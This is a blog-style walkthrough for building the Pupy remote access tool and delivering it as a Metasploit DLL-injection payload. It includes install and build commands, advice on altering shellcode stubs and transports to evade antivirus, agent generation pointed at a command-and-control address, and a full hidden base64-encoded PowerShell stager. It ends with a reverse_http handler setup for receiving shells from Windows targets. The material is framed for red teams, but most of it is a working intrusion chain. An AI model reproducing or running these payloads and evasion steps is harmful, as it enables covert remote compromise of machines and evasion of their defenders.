Wednesday, November 8, 2017

Pupy as a Metasploit Payload

Introduction

Pupy, written by N1nj4sec, is an open source, cross-platform, modular Remote Administration Tool (RAT) / post exploitation toolkit written in Python. It bundles all dependencies into a single PE or reflective DLL for execution on Windows environments. By utilizing the DLL feature, we can easily plug it into Metasploit as an exploit payload (assuming it supports dllinject as a payload). This allows us to easily shift our agents as Red Teams in order to avoid detection due to reused Indicators of Compromise (IoC)s.

Installing Pupy

We'll go ahead and grab virtualenv, if it isn't already installed. From there we'll initialize all of the submodules, and get ready to recompile the payloads. There are precompiled payloads available, but these are more likely to set off Antivirus. It's generally best practice to compile everything yourself anyways, unless you're going for anti-attribution. Yes, Blue Teams like to write people off as script kiddies too.

Note: Don't underestimate your enemy based on initial analysis.

sudo apt-get install virtualenv libssl-dev python-dev git
git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
virtualenv ./
. ./bin/activate
git submodule init
git submodule update
pip install -r pupy/requirements.txt
If you have issues with installing M2Crypto from pip, I'd recommend installing it on your distro and use that copy. Also, remove m2crypto line from pupy/requirements.txt
sudo apt-get install python-m2crypto
ln -s /usr/lib/python2.7/dist-packages/M2Crypto lib/python2.7/site-packages/M2Crypto

Build binaries

As previously discussed, we will compile our own payload template binaries. If this is your first time running the buildenv.sh script, it will take a few minutes to grab all of the mingw packages required for cross-compiling the templates. Many of the shellcode stubs are taken directly from metasploit/meterpreter projects, and will cause AV to flag a lot of the template files. I highly recommend spending 30 minutes or so to tweak the techniques, as it will go a long way towards AV evasion. Unfortunately, there is no master config for network signatures, but all transport modules are written in Python which can be found in pupy/network/transports and are generally easy to modify.

The following commands will populate the templates located in pupy/payload_templates.

# If you don't currently have multiarch, install it now.
sudo dpkg --add-architecture i386 && sudo apt-get update
cd client/sources
./buildenv.sh
./build.sh

Generate Agent DLL

Metasploit currently requires us to generate x86 binaries, so we'll stick with that for generating our pupy dll. This will allow us to use any of Metasploit's dll stubs, or use it directly for throwing exploits. For the sake of demonstration, we will stick to executing a powershell one liner to retrieve and execute the DLL using metasploit's framework.

Generate the pupy agent using the following line. Replace the IP address with your C2 node IP or hostname.

cd ../../pupy
./pupygen.py -O windows -A x86 -f client -S --randomize-hash auto_proxy --transport http --host 192.168.1.138:8080

Start Pupy Listener

We still need to get the metasploit stub ready, but go ahead and start a pupysh session using the same transport and port from above.

./pupysh.py -t http --port 8080

Generate Agent Stub

Start up msfconsole, and generate the stub by using the following commands.

use payload/windows/dllinject/reverse_http
set DLL ~/pupy/pupy/pupyx86.AUbLKU.dll
set LHOST 192.168.1.138
set LPORT 9090
generate -t psh-cmd

If all went well, you should have something similar to the following.

powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARwA2AGcAQQAxAG8AQwBBADcAVgBXAGUAMgAvAGEAUwBCAEQALwBPADUASAA2AEgAYQB3AEsAeQBiAGIATwB3AFoARABRADkAQgBJAHAAMAB0AG0AOABiAEkAbwBKAHgARwBCAEMASwBEAG8AdAA5AHQAbwBzAHIAQgArADEAMQA0AEQAcAA5AGIAdgBmAEcATwB3ADIAVgBkAEsANwA5AHEAUwB6AHMATAB3ADcAcgA1ADMANQB6AFcATgB4ADAAOABCAG0ASgBBAHcANABqAE8ANAAxADcAdgBPAGIAOAA3AE0AaABpAHAASABQAEMAWgBWADkAaABDAFcAdQBrAHIAWABXADQAdABrAFoAawBDAHQARQA1AGUANAA0AFkAYQA1AEUAVQBTAHYAMABFAFEAawBXAHQANwBmAE4ATgBJADUAeAB3AEUANwA3AGEAaABjAHoASgBVAG0AdwB2ADYAUQBFAEoANABMAEkALwBjAFYATgBWAHoAagBHAEYALwBmAEwATgBiAFkAWgA5ADUAbQByAC8ARgBuAHQAMABuAEMASgBhAEMARwBXAE4AWgBHADkAdwB0AHkARgBFAGoAZwA1AHIAeAAvAGEASwBIAGUAbABhAGsAYQBVAE0ASQBIAC8AKwBKAEUAWAA1AHgAZgAxAFIAYgBYADkASwBVAFUAMABFAFgAZwB6AFMAeABqADIAcQB3ADYAbAB2AE0AaAA5AEUAZgBNAEQAeAAxAG0ARQBCAGQANABnAGQAaAB3AG0AbwBjAHUAcQBVAHgASgBjAFgAVgBZAG4AUQBZAEoAYwBQAEEAQgByAFcAMgB4AGcAdABnAHEAZABoAEIAYwBoAEIAdgBqAEYAbQBLAFYAeAB3AEUARQAwAHUAZgBxAEoASwBmAEMAdwBIAE0AYQBoAHIAVABoAE8AagBCAE8AUQByAGUAcgBCAE4AdAB4AGcAbwBSAEsAawBsAEUAcgBjAEgAOABLADgATwBQAHMAaABEAFIAagB4AE0AZgBBAFoAagBzAFAASQB4AFAARwBXADIARABpAHAAYQBpAGgAdwBLAEgANwBBADcAawBJAFkANABGADAAWgA4AHMAOABxAEMAYwArAFYAUQBHAHIASQBZAGwARwBDAEYATAB4AHcAMABnAGkAZABsAE8ASwBUAEgAaQArACsAZABEAE4AUABtAGcAaABQAGsAVABpAEkAKwBjAHUAYgA4AHoAZgBuAGIAcABsAGsATAA3AE8AcwA1ADAAbQBHADEAZABuADgAdQBNAGIAZwBtAGoAQQBNAEUAMwBLAFUAdQArAE4AcQBFAG0AZgBBAE0AWQBpAEYAYwBRAGIAYgB5AGoAaABPAHMAYgBqAGcANQBqAG4AZwA4ADgAVwBDAHEANgBSAFoATgBwAEIAKwByAEYAOAB2AGgAVQBIAFUAWgAwAEMAWQBXAHkARgB4AEYAcQBCAFEASgBLAEoAQwByAG4AUABxAGoAOAB1AHAAaABWADAAUwA0AEYAWQBXAEkASgAvAFkAWgBjAFUASQByADgARwBMAFgAWQBxAFAAOABWAFYATABzAFEARQA0AEoAUABBAEYAQQB6AHMAdABUAEwARwBIAFcAQQA2AFoAeABNADEAZgBxAHIAVgA5AHcAcgA3AHEAcQBpAG0AaABEAG8ANABWAEcAMQBLAFUAZwBGAGUAUQBQAGYARgA3AFoAMAA1AFoARQBIAGcAOQBNAEwAQQBQACsASgB6ADIAUABJAEQAdQBRAHAAMwBpAFUAcgBxAG8AegBhAHcAOABQAGQAKwBEAEUATgArAGsASwBFAGsAawBiAHAAaABDAG8AOQBnAFMAWgAyAEoARQBzAFMATgB4AFMAcABDAFEAZwBxAFcAawBMAEQAdwB1ACsAVwAvAHUARwBpAGwAbAB4AEUAWQBKAEsAOAAwAHQAeABCAE8ASwB4AFcAbgBOAE0ARQBoAFkAbgBOAHEAUQBNAEkAaAA4AGIARQBiAFkASgBvAGoAbQBRAEUAaQBjAFIAaAB5AHMAWgBpAGIAeAB5AGwAUAA1AFYAMgBGAG8ASQBrAHAASgA0AEkARwBsAEwAYQBRAEIASwBIAG4ANABKAHMAdgBMAEkAQQBZAEgAagB5AGsAWABxAHkAWgBtAHUAaAA5AFIANwBJAFAATQBzAFYAOAA3AEYASABuAFEAbgBVAFcAVgBIACsAcwBHAGUAZABqAGgAdgAvAGUAdgByAE8ASgBUAHkAZQBZADQAbABBAEEAOAA4AHcANgBTAGEAOQBLAFEAUwBaAHgARgBZAGcAWgBOAG4AMgBQAHEAcwAvADkAMgA5AFAATgBtAHYANgA0ADIAWQAxAHkAawBRAEMAaQA3AFkAcQA1AG0ATABLAC8AbAB5AGcAYgBsAGwAVgBqAGcAYwBZAHcAKwBaAGgAQgA1AEoAdwA1ADkARgBTAFgANAB1AG0ARwB5AEcASABBAFIAMwBzAHIAMwBwAEsAbgBBAE0AOQBNAEQAYQB0AGoAcQBoAHQAUwBWAEgAYQBuAHIAQgByAHcAVABjAHEAVwBIAHIAZgBmAE8AaAA5ADUAYQBrACsAUABXAGYAdQBVAHEAZQBxAEkAYgAyAHIAQQAxADAAcgBUAEcAdABtAGQAYQBEAFcAYQAyAGQAZgBaAGgAcQBEAE8AagAvAGIAaABlAG0ANAByADIATQBKAG0AeABKADEAMwBSAHgAcQBTADIAbQBUAFUATwBVAFkAOABjAHoATAA3AGkAegBQAGIAeQA5AFUARQA5ADcARwByAHEALwByAEQAMgBIAEgAZgBXAGMAbAAzAHYAdgBXAHMAKwAxAE4AOQAxAFMASAAvAGEASABLAG0AMQBTADkAUgB2AHQAZABQACsAVgBOADIAcAB0AFUAYgBTAEoAagB0AHQAUgBDAGEAagBUAGEALwBEAGwAagBPAEwAbwBvAGsAcgBlADQALwAxAEcAMABUADIALwBYAGgAdAAxAGMATwBsAGIAOQBXAFUANwB1AG8ASwBUAGQAOQBGAFYAbgBkAGwATwBOAGwATQBrADIAOABtACsAOAB2ADYAWQBEAHkAQgBGADcAVwBpAEsAVQBhAHUAWABMAGQAZwA3AFEASAB0AGsAbwB5ADAAbgBhAEoAYwA2ADYATQA4ADMASwAyADEAVgB2AHUAVABnADYAZABNAHUAcQB0AEgAOABpAFIAMwA1AFoAdABwAGIAMAA4AEgAbwBhAEwAMAB2AEYAVQBuAHQAKwBHAE0ATABYADgAZABXADIAYgBqAFAAZgBDAG0AeQBJAHYAYwB5AGQASAAyAFUAOQBnAGYAegBXAFoAWQBsAHEAMgBWAHIAZABZADcAUAB0AEgAYgBZAEIAZQAxAHgANwBzAEIAYgBzAG4AMQB5AFUAMgA5AE0AVgAzAHYARwBPAHAATgA1AFIAdgByADAANgBqAHIASwBXADAANABFAE0ARQA3AFUAdABRAHgANgBwAEQATgA1AEwAZABIAHUAZgA0AEUAdABoAHAAQgBZAEYAMQA2AGkAZwA2ADgAMwBHADQANwBRAHIAMwBHADkAbQBpADMAZABwAGcAbABtAG0ATABmAGQAMwBiAGEASQA1ADAAYQBBAC8AZABhAHUANQBKAGwAKwBmAGYAOQAvAFYAaABQAGoAZgBHAHMAMABWACsAMwA0AFcAcwAwAEYATwBYAHUANwBtADEAZQBHADEAQQBjAEYAWAB4ADQAbAB2AFUAZgBqAFcAZwBEAHgAYwBrAEsAVQBhAGcARwBtAEwANQBsADUAMwBYAEMAdQBGAE4ATQAxAEcARgBJAGMAZwAxAEIATwBGADYAZgBHAHgAdwBIAG0ATQBJAEYAQgBGAGQAVQBXAGMASQBLAHAAYQBHAGQAVAAvAFAAagA3AEkAVwBiADUARABUAGYARgA5AEMAQgBFADEAaABlAFgAYgA2ADYARQByAG0AdgBnAHUASwAzAE8AVgArAFMAYgBtACsAZgB3AEUAdABvAGkAdwAyAHEAOQBuAEgAZwBzAFoAVgBVADIAMQAvAFYAYQBqAEMAMABhAC8AdABHAEQAUwBMADgAKwBiAGkAYQBZAFoAUQBKAFkARQBqAEsAUgB6ADYAQQBjAHIASgBLAGoAMQBiAEYAdgBFADAAcQBTAC8AVAAvAEEAbABXADAANQBnAG8AKwB6AHIAOABCADkAWQAzADIARAA5AHkAZgBBAHEAOABtADUAYwBHACsASQBIADUAUAArAEMAVQBrAGYAegBuAHcASwBTAEkATQBKAEUAMgBZAEwAUgBTAGYANwByAFQAWAA0AHkAOQBxADQAdABtAEYAdgAwAFMAUQBjAGIAZAA0ADgAcgA5AGEAOQB5AG0ANwBHAE0AQwAvAGcATAA4AEIAbgBDAG4AbQBUAHQAQQBKAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==

Set up Payload Delivery in Metasploit

Now, we need to setup a multi handler for delivering the DLL payload to the target. After the dll is delivered and executed, check back in your pupy tab for a shell.

use exploit/multi/handler
set payload windows/dllinject/reverse_http
set LHOST 192.168.1.138
set LPORT 9090
exploit

Get Shells

Execute the powershell stub that we generated above on a Windows machine, and enjoy your pupy shell delivered by Metasploit.

1 comment: